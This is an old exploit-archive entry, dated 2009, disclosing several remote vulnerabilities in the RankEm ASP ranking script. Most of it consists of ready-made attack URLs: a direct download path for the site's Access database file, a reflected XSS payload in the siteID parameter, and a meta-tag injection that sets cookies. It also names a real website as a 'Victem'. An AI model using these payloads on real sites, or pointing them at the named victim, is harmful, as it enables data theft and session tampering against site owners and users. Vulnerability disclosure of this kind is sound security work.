[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RankEm (DD/XSS/CM) Multiple Remote Vulnerabilities
# Published : 2009-01-16
# Author : Pouya_Server
# Previous Title : Ping IP (Auth Bypass) SQL Injection Vulnerability
# Next Title : BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities
#########################################################
---------------------------------------------------------
Portal Name: RankEm
Download : http://www.katywhitton.com/downloads/rankEm/rankEmDL.zip
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS/CM)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/topsites.mdb
[XSS]:
http://site.com/rankup.asp?siteID=<script>alert(1369)</script>
[CM]:
http://site.com/rankup.asp?siteID=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
---------------------------------
Victem :
http://www.top50.co.nz
# www.Syue.com [2009-01-16]